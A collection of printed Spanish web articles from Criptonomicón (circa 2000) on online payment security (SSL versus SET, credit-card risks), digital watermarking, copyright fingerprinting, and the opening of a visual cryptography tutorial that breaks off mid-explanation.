volver a satisfacer sexualmente a mi mujer", puede haber gente interesada
en el que lleva el carrito; como Internet es el medio ms fcil de espiar...
Bueno, ya te imaginas, que a m no me gustara nada que mis colegas se
enteraran de mis problemas familiares. Menos mal que es slo una
hiptesis. Bueno, siguiendo con punto 2, la principal diferencia es, que antes
eras una direccin IP, que slo tus colegas o proveedor de Internet podan
relacionar con tu persona. Ahora, dando tus datos, un aficionado podra, con
cierta facilidad, interceptar tu comunicacin y acosar sexualmente a tu
pareja. Y el peor punto es el 3, porque ya no depende del contenido del
carrito: los datos son confidenciales; que nadie se entere de tu nmero de
tarjeta y fecha de vencimiento y punto.
Suponiendo una definicin de datos confidenciales que cubre los casos
anteriores, yo personalmente no doy mis datos sin tener confianza en toda la
cadena de tratamiento de los mismos. En este sentido la postura de Toni
Oliver Servera (v. bol. 64, art. 10) es totalmente razonada: mejor contra

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos66.html (1 of 4) [25/10/2000 02:30:52 p.m.]

Luces y sombras en las compras por Internet

reembolso, o sino dudo mucho. Esta confianza se expresa en primer lugar


en el uso de un servidor seguro (que se cierra el candado), y si esto verifico
primero si el sitio con el cual estoy conectado de verdad es el que creo que
debera ser. Por ejemplo www.banesto.com tiene sede en EEUU, y no en
Madrid, por lo que no es de fiar.
A continuacin hay que tener en cuenta si los datos que envas son
imprescindibles para el destinatario; en el caso del libro de problemas
sexuales no se puede evitar que la tienda sepa quien tiene estos problemas,
por lo que creo que sera mejor usar una librera geogrficamente lejana.
Desde luego, slo doy mi nmero de la tarjeta de crdito a una tienda en la
cual tenga muchsima confianza.
La solucin natural para cualquier tienda electrnica es el uso de los
terminales de punto de venta virtuales o SET. En el primer caso la tienda
enlaza con su banco con un URL de tipo:
importe=10.000&carrito=25.341&comercio=tu_hipermercado

El caso es que t ves la pantalla de su banco, en la que puedes teclear (con


servidor seguro, por supuesto) tu nmero de tarjeta y fecha de vencimiento,
y los datos sern enviados al banco del comercio electrnico. El comercio
slo recibe la confirmacin de su banco. El funcionamiento de SET es
similar: el comercio no se puede enterar del nmero de tu tarjeta de crdito,
slo sabe si se ha autorizado el pago o no.
La solucin que adoptan muchas tiendas en el extranjero implica que t les
das el nmero de tu tarjeta de crdito. Yo creo, que si les das el nmero de
tu tarjeta, les das suficientes herramientas para llevarse todos los meses el
lmite de tu tarjeta. Mucha confianza tengo que tener en la tienda para que
permito algo as. Y no es slo confianza en la honestidad de la tienda, sino
adems en su profesionalidad en temas de seguridad informtica.
En el caso de CDUniverse que comenta Alex Contreras (v. bol. 64, art. 10),
es justamente este aspecto el que ha fallado: el denominado Maxim (un ruso
de 19 aos que intenta extorsionar a CDUniverse) ha conseguido entrar en
los sistemas de CDUniverse y se ha apoderado de los datos personales de
sus 300.000 clientes. Sin entrar en los detalles de como lo habr hecho,
aparentemente dispone de muchos datos de estos clientes, que podr
abusar de ellos. De estos datos los peores son de la tarjeta de crdito usada
en la compra.
Una matizacin me gustara hacer antes de proceder al penltimo prrafo.
Es verdad, que un pago hecho con una tarjeta de crdito sin que conste la
firma del titular es repudiable; quiere decir que con una sola llamada al
centro autorizador te devolvern el dinero. La pega para el titular es doble:
1. El recibo es emitido un mes despus del pago, por lo que el titular se
tiene que molestar 3 veces.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos66.html (2 of 4) [25/10/2000 02:30:52 p.m.]

Luces y sombras en las compras por Internet

2. El centro autorizador tarda unos cuantos meses en devolver. O sea, la


gente que siempre tiene el triple del lmite de su tarjeta de crdito en la
cuenta corriente no tienen que preocuparse de nada. Los ms pobres
sufrirn los nmeros rojos ...
Esta posibilidad de repudiar los pagos nos llevarn a la autenticacin de los
interlocutores; no me cabe ninguna duda de que, en un plazo de 2 aos,
tengamos unos certificados; uno de nuestro banco, otro del gobierno, y ms
de nuestro club de paddel / tenis / golf / .... etc. Sobre todo los bancos
exigirn que firmes los pagos, para que no puedas repudiarlos. La nica
duda que tengo es que si sern los comercios, hartos del repudio, que van a
obligar a los bancos a certificar a sus clientes o si esto ser presentado
como servicio de los bancos a los comerciantes y clientes. De todos modos,
el mundo de la PKI es un mundo muy amplio; invito a los respectivos
expertos a seguir en este debate.
Volviendo a los datos confidenciales, espero que os dais cuenta que slo
hay que suministrarlos a los sitios que de verdad los necesitan, y adems
slo por un protocolo seguro (SET o SSL), y nunca dejar los recibos del
cajero en la papelera al lado del mismo ...
Publicado en el Boletn del Criptonomicn #66.
John Heppe trabaja en Ibermtica en el departamento Oferta Tecnolgica como
especialista en e-business y seguridad. Lleva 19 aos trabajando en varios temas en el
sector de la informtica, especializndose ltimamente en temas de seguridad en
Internet.

Informacin adicional

Seguridad en el comercio electrnico: SSL o SET?

Seguridad en SSL, artculo publicado en iWorld.

SET a fondo, artculo publicado en iWorld.

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos66.html (3 of 4) [25/10/2000 02:30:52 p.m.]

Luces y sombras en las compras por Internet

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos66.html (4 of 4) [25/10/2000 02:30:52 p.m.]

Seguridad en el comercio electrnico: SSL o SET?

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Seguridad en el comercio electrnico: SSL o SET?

Cuando se habla de la carrera que existe


Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

entre la investigacin de nuevas tecnologas,


la comercializacin de esas tecnologas y la
creacin de estndares que impongan orden y
velen por la interoperabilidad, resulta de
referencia obligada la teora del Apocalipsis
de los elefantes de David Clark, del MIT.
Podemos imaginar mentalmente una curva
que tendra la forma de la serpiente del
Principito que se trag al elefante, slo que en
este caso, en lugar de uno, se trag dos. El
primero de ellos representa la intensa
actividad de investigacin que sigue a un
excitante o prometedor descubrimiento,
sentndose las bases para el futuro desarrollo
de una nueva tecnologa. El segundo elefante
representa la actividad comercial de las
compaas que recogen el testigo de los
investigadores y comienzan a lanzar al
mercado productos que incorporan la tecnologa. Es un momento de dura
competencia, en el que cada compaa intenta hacerse con la mayor cuota
de mercado posible, acudiendo a soluciones que funcionen como sea y que
rara vez pueden interoperar con productos de la competencia.
Entre ambos elefantes queda un hueco que debe ser aprovechado por los
organismos de creacin de estndares con el fin de evitar la jungla que se
avecina si las empresas privadas trabajan sobre el tema sin coordinacin. Si
la estandarizacin llega demasiado pronto, la tecnologa puede no ser
suficientemente comprendida o resultar inmadura, por lo que los estndares
sern malos e intiles. Si llega demasiado tarde, alguna compaa o varias
habrn impuesto sus propias soluciones, que habrn sido adoptadas como
estndar de facto del sector emergente. En el mundo de Internet, la

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros08.html (1 of 4) [25/10/2000 02:30:53 p.m.]

Seguridad en el comercio electrnico: SSL o SET?


Consejos prcticos

Referencias

Libro de Visitas

seguridad y el comercio electrnico, los elefantes tornaron ser toros de difcil


lidia. El espacio entre los dos elefantes en la panza de la serpiente es tan
delgado, que ya estn saliendo nuevos productos aun antes de que las
tecnologas estn maduras. Nadie esperaba que Internet, o ms
concretamente, la World Wide Web, creciera al ritmo exponencial de los
ltimos aos. Sus posibilidades para el comercio fueron rpidamente
vislumbradas por los ms despabilados y en un tiempo rcord pas a
transformarse en teatro de transacciones comerciales, financieras y de todo
tipo. Haba que vender, pero vender ya. No poda esperarse a magnficos
estndares que velaran por la rigurosa implantacin de todos los detalles.
Qu mtodo resulta ms cmodo e inmediato para pagar? La tarjeta de
crdito. Al usuario le preocupa la seguridad? Usemos un canal seguro para
transmitir el nmero de la tarjeta. Fue as como en poco tiempo se impuso
como norma tcitamente acordada el emplear SSL para cifrar el envo de
datos personales, entre ellos el nmero de tarjeta.
SSL (Secure Sockets Layer) es un protocolo de propsito general para
establecer comunicaciones seguras, propuesto en 1994 por Netscape
Communications Corporation junto con su primera versin del Navigator.
Hoy constituye la solucin de seguridad implantada en la mayora de los
servidores web que ofrecen servicios de comercio electrnico. Para pagar, el
usuario debe rellenar un formulario con sus datos personales (tanto para el
caso del envo de los bienes comprados, como para comprobar la veracidad
de la informacin de pago), y los datos correspondientes a su tarjeta de
crdito (nmero, fecha de caducidad, titular). Esta arquitectura no exige que
el servidor disponga de capacidades especiales para el comercio. Basta con
que se utilice como mnimo un canal seguro para transmitir la informacin de
pago y el comerciante ya se ocupar manualmente de gestionar con su
banco las compras. El canal seguro lo proporciona SSL. Sin embargo, este
enfoque, aunque prctico y fcil de implantar, no ofrece una solucin
comercialmente integrada ni totalmente segura (al menos en Espaa, debido
a que los navegadores utilizan 40 bits de longitud de clave, proteccin muy
fcil de romper). SSL deja de lado demasiados aspectos para considerarse
la solucin definitiva:
Slo protege transacciones entre dos puntos (el servidor web
comercial y el navegador del comprador). Sin embargo, una operacin
de pago con tarjeta de crdito involucra como mnimo tres partes: el
consumidor, el comerciante y el emisor de tarjetas.
No protege al comprador del riesgo de que un comerciante deshonesto
utilice ilcitamente su tarjeta.
Los comerciantes corren el riesgo de que el nmero de tarjeta de un
cliente sea fraudulento o que sta no haya sido aprobada.
Son demasiados problemas e incertidumbres como para dejar las cosas
como estn. Se haca necesaria la existencia de un protocolo especfico
para el pago, que superase todos los inconvenientes y limitaciones

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros08.html (2 of 4) [25/10/2000 02:30:53 p.m.]

Seguridad en el comercio electrnico: SSL o SET?

anteriores, motivo por el que se cre SET.


El estndar SET (Secure Electronic Transaction) fue desarrollado en 1995
por Visa y MasterCard, con la colaboracin de gigantes de la industria del
software, como Microsoft, IBM y Netscape. La gran ventaja de este protocolo
es que ofrece autenticacin de todas las partes implicadas (el cliente, el
comerciante y los bancos, emisor y adquiriente); confidencialidad e
integridad, gracias a tcnicas criptogrficas robustas, que impiden que el
comerciante acceda a la informacin de pago (eliminando as su potencial de
fraude) y que el banco acceda a la informacin de los pedidos (previniendo
que confeccione perfiles de compra); y sobre todo gestin del pago, ya que
SET gestiona tareas asociadas a la actividad comercial de gran importancia,
como registro del titular y del comerciante, autorizaciones y liquidaciones de
pagos, anulaciones, etc.
Entonces, si todo son alabanzas, ventajas y puntos fuertes, por qu SET no
termina de implantarse? Por qu no goza de la popularidad de SSL, si se
supone mejor adaptado? En primer lugar, su despliegue est siendo muy
lento. Exige software especial, tanto para el comprador (aplicacin de
monedero electrnico) como para el comerciante (aplicacin POST o
terminal de punto de venta), que se est desarrollando con lentitud. En
segundo lugar, aunque varios productos cumplan con el estndar SET, esto
no significa necesariamente que sean compatibles. Este es un problema que
exige mayores esfuerzos de coordinacin y ms pruebas a escala mundial
para asegurar la interoperabilidad. Sus puntos fuertes son tambin su taln
de Aquiles: la autenticacin de todas las partes exige rgidas jerarquas de
certificacin, ya que tanto los clientes como comerciantes deben adquirir
certificados distintos para cada tipo de tarjeta de crdito, trmites que
resultan engorrosos, cuando no esotricos, para la mayora de los usuarios.
En definitiva, SET es un elefante de gran tamao y fuerza, pero de
movimientos extraordinariamente pesados. SSL es una liebre que le ha
tomado la delantera hace aos. No es tan perfecto, no ofrece su seguridad ni
sus garantas, pero funciona. Y lo que es ms: el usuario de a pie no tiene
que hacer nada! Entretanto, mientras SET llega a la meta o muere por el
camino, eso s, no olvide pagar todas sus compras usando SSL.
Publicado en el Boletn del Criptonomicn #54.

Informacin adicional

SETCo, organizacin que promueve el desarrollo y uso de SET en Internet.

SET Secure Electronic Transaction at Visa

Seguridad en SSL, artculo publicado en iWorld.

SET a fondo, artculo publicado en iWorld.

Comercio electrnico

Otros artculos publicados


file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros08.html (3 of 4) [25/10/2000 02:30:53 p.m.]

Seguridad en el comercio electrnico: SSL o SET?

Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros08.html (4 of 4) [25/10/2000 02:30:53 p.m.]

Marcas de agua

Comercio electrnico

Criptologa y seguridad

Marcas de agua

Cuestiones legales

Por Jos M. Martinez

Intimidad y privacidad

El Propietario de Derechos de Autor de un documento digital necesita, para

Virus

obtener una justa remuneracin por la informacin que produce, de medios


tcnicos adecuados que permitan la autenticacin de dicha informacin (esto
tambin es exigido por el usuario que disfruta de la misma), as como el
seguimiento de copias ilegalmente distribuidas.
El uso de marcas de agua ("watermarks") como sistema de proteccin es
casi tan antiguo como la fabricacin de papel. Durante cientos de aos,
cualquiera que poseyera o fabricase un documento u obra de arte valioso/a
lo marcaba con un sello de identificacin o marca de agua (visible o no), no
slo para establecer su propiedad, origen o autenticidad, sino para
desalentar a aquellos que pudieran intentar robarlo.
La posibilidad de digitalizacin de cualquier tipo de informacin (imgenes,
vdeo, audio, texto, etc.) junto a la interconectividad global permite realizar
copias perfectas de la informacin digitalizada. Los procesos criptogrficos
permiten proteger la adquisicin legal de la informacin, pero una vez
obtenida la informacin se puede revender copias exactas. Por lo tanto,
surge la necesidad de un sistema de seguimiento de las copias para la
proteccin de los Derechos de Autor, que tambin se utilice en el caso de
adquisicin legal para distribucin fraudulenta (copias ilegales). La no
disponibilidad de dichos sistemas ha frenado (y sigue frenando) la
implantacin de servicios multimedia donde la informacin "tiene un precio".
Las propias caractersticas de la informacin digital (facilidad de rplica,
facilidad de transmisin y uso mltiple, facilidad de tratamiento y
modificacin, equivalencia de las copias digitales, etc.) facilitan la agresin
contra los Derechos de Autor del propietario de dicha informacin, lo que
hace necesaria la existencia de un sistema de proteccin potente. Por todo
esto se ha expandido el concepto de marcas de aguas al mundo digital,
incluyendo impresiones digitales inmateriales utilizadas para autentificar la
propiedad de una informacin digital y servir en la defensa de los intereses
de dicha propiedad.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos64.html (1 of 5) [25/10/2000 02:30:53 p.m.]

Marcas de agua

Las tcnicas de marcas de agua son utilizadas para la autenticacin (tanto


del distribuidor o propietario legal, como de que el original no ha sido
falsificado) de la informacin, as como para el seguimiento de copias, ya
que permiten la identificacin del autor, propietario, distribuidor y/o
consumidor autorizado de un documento digital.
Esta tcnica de proteccin requiere bsicamente dos herramientas:
Introduccin de la firma o marca en la informacin a proteger.
Extraccin e identificacin de la marca.
Una marca de agua es un cdigo de identificacin, perceptible (visible y/o
audible) o preferiblemente imperceptible, que se encuentra
permanentemente "incrustado" en la informacin (no desaparece despus
del descifrado) y que puede contener informacin acerca del propietario, de
los derechos de autor, el creador, el usuario autorizado, el nmero de copias
o reproducciones autorizadas, el terminal autorizado, etc.
El desarrollo de un sistema de marcas de aguas digitales requiere la
particularizacin a un tipo de seal determinado (imagen, audio, etc.), pues
el diseo de un sistema de estas caractersticas logra mucho mejores
resultados si se realiza en funcin de la respuesta humana al medio a
percibir. En orden de efectividad, una marca de agua debe ser robusta, no
ambigua e imperceptible:
La robustez se refiere a que debe ser difcil de eliminar o de ser
distorsionada hasta el punto de hacerse indetectable. En particular,
una marca de agua debe ser robusta frente a: Anlisis estadsticos
como, por ejemplo, un filtro de Kalman (para imgenes);
Procesamientos comunes de la seal, como por ejemplo conversiones
A/D, D/A, remuestreo, recuantificacin, compresin, etc.; Distorsiones
geomtricas: rotacin, traslacin, recortes y cambios de escala (para
imgenes); y colusin y falsificacin, esto es, ante la combinacin de
copias de un mismo documento. La clave fundamental para hacer que
una "marca de agua" sea robusta es introducirla en las componentes
perceptiblemente ms significativas de la seal o de su espectro.
La ambigedad se refiere a que la probabilidad de un falso positivo en
la deteccin de la marca ha de ser muy baja.
La imperceptibilidad depender del sentido receptor (vista, odo), y se
referir siempre a la comparacin con la original (no se trata de medir
la calidad).
La mayora de los actuales sistemas de marcas de aguas digitales para
imgenes se basan en introducir la marca en las componentes espectrales
perceptiblemente significativas de una imagen, que son las bajas
frecuencias. Ahora bien, la modificacin de dichas componentes ha de ser lo
suficientemente pequea como para que no se pueda percibir a simple vista
(caracterstica de invisibilidad de la "marca de agua"). Lo mismo ocurre para
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos64.html (2 of 5) [25/10/2000 02:30:53 p.m.]

Marcas de agua

seales de audio, si bien la respuesta perceptual sigue otros patrones.


La introduccin de marcas de agua en documentos digitales se puede
abordar tambin como un problema de comunicaciones digitales. En paralelo
con la creciente sofisticacin en el modelado y explotacin de las
propiedades de los sistemas visual y auditivo humanos, se ha impulsado el
desarrollo correspondiente en tcnicas de comunicacin de banda ancha.
Un sistema de marcas de agua estndar est compuesto por dos mdulos
principales, que realizan los procesos de codificacin (o insercin) de la
marca y decodificacin (o extraccin e identificacin) de la misma.
El mdulo codificador realiza la insercin de la marca de agua X en la
informacin original I para crear la informacin marcada I', que debe ser
visualmente y/o auditivamente similar a I.
Las tcnicas de insercin existentes se pueden clasificar en dos grupos, en
funcin del tipo de elemento de la imagen al que la marca de agua afecta de
manera directa:
Tcnicas en el dominio del espacio: la marca modifica directamente el
valor de luminancia y/o crominancia de los pixeles.
Tcnicas en el dominio de la frecuencia: la marca modifica
directamente el valor de los coeficientes espectrales de la imagen. La
mayor parte de las tcnicas desarrolladas en este dominio estn
inspiradas en mtodos de codificacin y compresin.
El mdulo decodificador realiza en primer lugar la extraccin de la marca X*
de una informacin, cuyos derechos de propiedad se desean probar, I*,
posiblemente manipulada o distorsionada, haciendo uso o no (esto depende
de la tcnica de extraccin) de la informacin original I. A continuacin
establece el parecido entre la marca extrada X* y la marca original X,
calculando el valor de un ndice de similitud entre ambas. Finalmente utiliza
una funcin de comparacin (e.g., un umbral T, un valor de relacin seal a
ruido) para determinar si la informacin test I* es una versin marcada de la
informacin original I.
Tambin las tcnicas de decodificacin de la marca de agua se pueden
clasificar en dos grupos, segn necesiten o no a la informacin original I para
extraer la marca. Los sistemas de marcas de aguas en que se utilizan la
informacin original para la deteccin de la marca se denominan sistemas
privados, en caso contrario reciben el nombre de sistemas pblicos. Para
aplicaciones concretas puede resultar crucial el hecho de que la informacin
original no est directamente implicada en el proceso de deteccin. As,
puede resultar interesante poder demostrar ante un tribunal que una
determinada marca de agua est presente en una informacin sin mostrar
pblicamente el documento original.
Una vez que la marca de agua ha sido introducida en un documento digital,

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos64.html (3 of 5) [25/10/2000 02:30:53 p.m.]

Marcas de agua

es susceptible de un amplio abanico de ataques que la distorsionarn, as


como al documento en el que est inserta. Segn la causa y objetivo que los
origina, stos se pueden agrupar en ataques no intencionados e
intencionados.
Los ataques no intencionados son aquellos a los que la marca de agua est
sometida de manera casi inevitable. Ejemplos claros son:
El propio proceso de recuantificacin del documento marcado antes de
ser expedido.
El ruido introducido por el canal de transmisin por el que se enva
dicho documento marcado.
Los ataques intencionados son las manipulaciones que realiza un pirata o
"hacker" sobre el documento marcado con el fin de eliminar las protecciones
de Derechos de Autor. Los objetivos fundamentales son dos:
Manejar informacin libre de cualquier firma. Estos ataques consisten
en la manipulacin del documento marcado con la finalidad de
distorsionar la marca embebida en l, de forma que sta se haga
indetectable. Como se ha comentado, la marca de agua ha de ser ms
resistente que la informacin en s, es decir, la degradacin perceptible
de dicha informacin ha de ocurrir antes de que el nivel de distorsin
sufrido por la marca como consecuencia de las manipulaciones sea tal,
que la marca deje de ser detectable. Algunos de estos procesos, como
conversiones A/D, D/A, procesos de compresin, rotacin, traslacin,
etc., podran aparecer de igual modo como ataques no intencionados,
pues pueden resultar necesarios para la transmisin o almacenamiento
de la imagen o bien el usuario puede desear realizarlos, sin tener como
objetivo la eliminacin de los Derechos de Autor. Por lo tanto, una
marca robusta es aquella que resiste a distorsiones como las descritas
hasta ahora, sean o no intencionadas.
Poner su propia firma. Estos ataques pueden dar lugar a confusin en
la determinacin de la propiedad de dichos derechos. El objetivo del
agresor en este caso es introducir su firma en la imagen para reclamar
que l es el propietario de la imagen original. Por lo tanto la robustez
de una marca no es suficiente para garantizar una adecuada
proteccin de los Derechos de Autor.
Las tcnicas de marcas de agua actuales suelen resultar robustas frente a la
mayora de los ataques descritos hasta ahora. El verdadero "cuello de
botella" de la robustez de las marcas de aguas son los ataques que dan
lugar a una interpolacin de la seal digital que representa la informacin. En
el caso de imgenes estos ataques pueden realizarse mediante rotacin,
traslacin de un nmero no entero de pixeles y cambios de escala.
Publicado en el Boletn del Criptonomicn #64.
Jos M. Martnez es doctor ingeniero de telecomunicacin, del Grupo de Tratamiento de

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos64.html (4 of 5) [25/10/2000 02:30:53 p.m.]

Marcas de agua

Imgenes del Dpto. de Seales, Sistemas y Radiocomunicaciones de la E.T.S. Ing.


Telecomunicacin de la Universidad Politcnica de Madrid.

Informacin adicional

Proteccin del copyright electrnico: Fingerprinting

Digital watermarking, steganography & information hiding

Steganography & Digital Watermarking

Criptografa visual

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos64.html (5 of 5) [25/10/2000 02:30:53 p.m.]

Proteccin del copyright electrnico: Fingerprinting

Comercio electrnico

Criptologa y seguridad

Proteccin del copyright electrnico: Fingerprinting

Cuestiones legales

Por Josep Domingo Ferrer y Jordi Herrera Joancomart

Intimidad y privacidad

Desde mediados de los noventa, Internet ha pasado de ser un medio de

Virus

comunicacin acadmico a ser el medio natural de intercambio de


informacin para una gran parte de los sectores productivos. Este hecho ha
provocado un crecimiento espectacular del comercio de bienes en soporte
electrnico y por consiguiente ha surgido la necesidad de crear una
herramienta dinmica y eficaz para la proteccin del copyright de dichos
bienes.
Para satisfacer la necesidad de proteccin aludida, se han desarrollado
tcnicas de "fingerprinting", tambin denominadas watermarking, que
consisten en el marcaje de la informacin electrnica vendida. Dichas
tcnicas no estn enfocadas a la prevencin de copias piratas de productos
sino que se encaminan a la identificacin del infractor en caso de encontrar
alguna de dichas copias.
Histricamente el concepto clsico de fingerprinting se inici en 1983 con un
artculo de N. R. Wagner. Dicho concepto clsico de fingerprinting se basa
en la introduccin de una serie de marcas imperceptibles en un producto en
soporte electrnico (p. e. pelcula, imagen, software, etc.) antes de su venta
o distribucin, de modo que su posterior identificacin permita al vendedor
determinar cul fue el comprador de dicho artculo y en caso de que ste sea
hallado en manos de otro individuo poder llevar a cabo las acciones
oportunas contra el comprador por distribucin ilegal.
En el fingerprinting clsico, descrito anteriormente, el proceso de marcaje de
las copias es realizado totalmente por el vendedor, con lo cual tanto el
vendedor como el comprador conocen la copia marcada que se ha vendido.
De este modo, el hecho de encontrar una copia con las marcas de
determinado comprador no le inculpa necesariamente a l, ya que no es el
nico conocedor de la copia; podra ser que un vendedor deshonesto
quisiera acusarle injustamente generando l mismo una copia ilegal con las
marcas del comprador. Es ms, este argumento podra ser utilizado por
compradores deshonestos para defenderse de acusaciones ciertas de

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos34.html (1 of 3) [25/10/2000 02:30:54 p.m.]

Proteccin del copyright electrnico: Fingerprinting

redistribucin ilegal. Con el objetivo de solucionar este problema nace el


concepto de fingerprinting asimtrico, en el cual el vendedor no ve la copia
marcada que entrega al comprador, de modo que este ltimo es el nico que
la posee y por tanto cualquier redistribucin posterior de la misma puede
serle imputada sin lugar a dudas. La idea principal en la que difiere del
fingerprinting clsico, es que aqu en el proceso de marcaje intervienen tanto
el vendedor como el comprador
Por otro lado, es interesante que el comercio electrnico preserve el
anonimato de las transacciones; en cambio, el fingerprinting asimtrico no
contempla esta caracterstica, puesto que el proceso de marcaje revela la
identificacin del comprador. De aqu el nacimiento de un nuevo concepto, el
fingerprinting annimo. La idea es aadir al fingerprinting asimtrico la
caracterstica de anonimato del comprador; es decir, en el proceso de
marcaje y venta, no slo el vendedor no conoce la copia vendida con las
marcas identificadoras, sino que ni tan siquiera conoce la identidad del
comprador (tan solo conoce un seudnimo), sin que ello represente ningn
impedimento posterior para su identificacin en caso de redistribucin.
Como vemos, las tcnicas de fingerprinting han sufrido una importante
evolucin en su corta historia dada su gran importancia en el campo de la
venta de bienes en soporte electrnico. Si bien los algoritmos descritos en
algunos de estos mtodos son an demasiado complejos y difciles de
aplicar en la prctica (como sus propios autores reconocen), empiezan ya a
aparecer trabajos en los que se presentan mtodos ms eficientes e
implementables que abren nuevos horizontes para el uso comercial del
fingerprinting.
Por ltimo, cabe destacar el creciente numero de empresas que se dedican
al tema como pueden ser Digimarc, Signum Technologies, R3S, Mediasec
Technologies o CRL as como el hecho que grandes compaas como es el
caso de IBM, AT&T, Sony, NTT, Matsushita, NEC, Philips estn realizando
estudios sobre diferentes posibles tcnicas de marcaje.
Publicado en el Boletn del Criptonomicn #34.
Josep Domingo Ferrer y Jordi Herrera Joancomart son investigadores del Departament
dEnginyeria Informtica de la Universitat Rovira i Virgili de Tarragona, expertos en
criptografa.

Informacin adicional

Marcas de agua

Digimarc

Veridicom

Mediasec

Enlaces en Webreference.com

Artculos publicados
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos34.html (2 of 3) [25/10/2000 02:30:54 p.m.]

Proteccin del copyright electrnico: Fingerprinting

Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.


Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos34.html (3 of 3) [25/10/2000 02:30:54 p.m.]

Criptografa visual

Comercio electrnico

Criptologa y seguridad

Criptografa visual

Cuestiones legales

Por Luis Hernndez Encinas

Intimidad y privacidad

Si en lugar de dividir secretamente un nmero, tal y como se lleva a cabo en


la divisin de secretos, mediante los protocolos de los esquemas umbrales,
lo que se desea es enmascarar una imagen, estamos ante la criptografa
visual, que hace uso de los esquemas visuales umbrales. Estos esquemas
siguen el mismo procedimiento que los esquemas umbrales m de n, pero
con las siguientes caractersticas:

Virus

1. El secreto S es una imagen formada por pixeles blancos y negros.


2. Las n sombras en que se divide la imagen secreta son otras tantas
transparencias, cada una con una imagen que tiene el mismo tamao y el
mismo nmero de pixeles que la imagen original.
3. La recuperacin de la imagen secreta se lleva a cabo mediante la
superposicin de m transparencias cualesquiera, de modo que no es posible
obtener la imagen original con slo m-1, o menos, de ellas.
Vamos a detallar cmo construir un esquema visual umbral 2 de 2, de modo
que podamos enmascarar una imagen para luego recuperarla. Dado que el
esquema es 2 de 2, la imagen se dividir en 2 sombras o transparencias,
una para cada uno de los participantes, de modo que ninguno de ellos pueda
conocer ninguna informacin de dicha imagen original a partir de la imagen
que recibe, y de tal manera que slo se pueda recuperar la imagen original
superponiendo las 2 transparencias en que se ha dividido la imagen.
Para elaborar las sombras supondremos que la imagen a ocultar (el nmero
Pi) est contenida en un rectngulo, dividido en pixeles, como se ve en la
figura 1.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos27.html (1 of 9) [25/10/2000 02:30:56 p.m.]

Criptografa visual

Figura 1. Imagen secreta a ocultar.


Conviene sealar que esta figura contiene muy pocos pixeles, por lo que el
proceso ser puramente ilustrativo, sin buscar una buena definicin de la
imagen resultante.
El esquema visual 2 de 2 para dividir la imagen secreta consiste en
enmascarar cada uno de los pixeles de la imagen original en dos pixeles,
cada uno de los cuales ocupar el lugar del pixel original, pero en cada una
de las sombras. Para llevar a cabo este enmascaramiento, cada uno de los
pixeles de cada una de las sombras est dividido en dos semipixeles, la
mitad blanco y la mitad negro. El algoritmo para enmascarar cada uno de los
pixeles originales se ilustra en la figura 2 y es el siguiente:

